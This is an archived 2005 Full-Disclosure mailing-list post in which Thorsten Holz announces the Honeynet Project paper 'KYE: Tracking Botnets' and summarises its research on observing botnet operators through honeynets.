[Full-disclosure] Know Your Enemy: Tracking Botnets

From: Thorsten Holz (thorsten.holz_at_mmweg.rwth-aachen.de)
Date: 03/14/05

  • Next message: pingywon: "Re: [Full-disclosure] Know Your Enemy: Tracking Botnets"
    Date: Mon, 14 Mar 2005 04:08:15 +0100
    To: dailydave <dailydave@lists.immunitysec.com>, honeypots@securityfocus.com, full-disclosure@lists.grok.org.uk


    The Honeynet Project and Research Alliance is excited to announce the
    release of a new paper "KYE: Tracking Botnets". This paper is based on
    the extensive research by the German Honeynet Project.

        KYE: Tracking Botnets


    Honeypots are a well known technique for discovering the tools, tactics,
    and motives of attackers. In this paper we look at a special kind of
    threat: the individuals and organizations who run botnets. A botnet is a
    network of compromised machines that can be remotely controlled by an
    attacker. Due to their immense size (tens of thousands of systems can be
    linked together), they pose a severe threat to the community. With the
    help of honeynets we can observe the people who run botnets - a task
    that is difficult using other techniques. Due to the wealth of data
    logged, it is possible to reconstruct the actions of attackers, the
    tools they use, and study them in detail. In this paper we take a closer
    look at botnets, common attack techniques, and the individuals involved.

    We start with an introduction to botnets and how they work, with
    examples of their uses. We then briefly analyze the three most common
    bot variants used. Next we discuss a technique to observe botnets,
    allowing us to monitor the botnet and observe all commands issued by the
    attacker. We present common behavior we captured, as well as statistics
    on the quantitative information learned through monitoring more than one
    hundred botnets during the last few months. We conclude with an overview
    of lessons learned and point out further research topics in the area of
    botnet-tracking, including a tool called mwcollect2 that focuses on
    collecting malware in an automated fashion.

    Thank you for your time,
       Thorsten Holz, on behalf of the GHP

    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://www.secunia.com/

  • Next message: pingywon: "Re: [Full-disclosure] Know Your Enemy: Tracking Botnets"